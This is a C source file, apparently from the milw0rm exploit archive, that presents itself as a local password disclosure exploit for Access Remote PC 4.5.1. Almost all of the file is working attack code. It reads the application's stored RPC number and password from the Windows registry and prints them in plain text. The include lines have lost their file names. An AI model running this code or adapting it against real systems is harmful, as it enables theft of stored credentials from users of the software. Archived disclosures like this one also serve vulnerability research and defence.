/***************************************************************** Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan Application: Access Remote PC 4.5.1 (and probably prior versions) Vendor: www.access-remote-pc.com Vulnerable Description: Access Remote PC 4.5.1 discloses passwords to local users. Discovered & Coded by: Kozan Credits to ATmaCA Web : www.netmagister.com Web2: www.spyinstructors.com Mail: kozan@netmagister.com *****************************************************************/ #include #include #define BUF 100 int main() { HKEY hKey; char RPCNumber[BUF], Password[BUF]; DWORD dwBuf = BUF; if( RegOpenKeyEx( HKEY_CURRENT_USER, "Software\\Access Remote PC\\Client\\Options\\Proxy", 0, KEY_QUERY_VALUE, &hKey ) !=ERROR_SUCCESS ) { fprintf( stdout, "Access Remote PC is not installed on you PC!\n" ); return -1; } if( RegQueryValueEx( hKey, "RPCNumber", NULL, NULL, (BYTE *)&RPCNumber, &dwBuf ) != ERROR_SUCCESS ) lstrcpy( RPCNumber,"Not Found!\n" ); if( RegQueryValueEx( hKey, "Password", NULL, NULL, (BYTE *)&Password, &dwBuf ) != ERROR_SUCCESS ) lstrcpy( Password,"Not Found!\n" ); fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" ); fprintf( stdout, "Credits to AtmaCA\n" ); fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" ); fprintf( stdout, "kozan@netmagister.com\n\n" ); fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber ); fprintf( stdout, "Password\t: %s\n", Password ); return 0; } // milw0rm.com [2005-07-04]